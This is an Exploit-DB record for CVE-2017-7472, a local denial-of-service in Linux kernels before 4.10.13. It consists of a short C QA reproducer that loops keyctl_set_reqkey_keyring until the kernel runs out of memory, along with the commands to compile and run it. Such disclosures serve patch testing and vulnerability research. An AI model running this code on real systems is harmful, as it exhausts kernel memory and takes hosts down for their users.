Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service

2017-06-07T00:00:00
ID EDB-ID:42136
Type exploitdb
Reporter Exploit-DB
Modified 2017-06-07T00:00:00

Description

Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service. CVE-2017-7472. Dos exploit for Linux platform. Tags: Denial of Service (DoS)

                                        
                                            /*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:

gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472

(will run the kernel out of memory)
*/
#include &lt;sys/types.h&gt;
#include &lt;keyutils.h&gt;

int main()
{
	for (;;)
		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}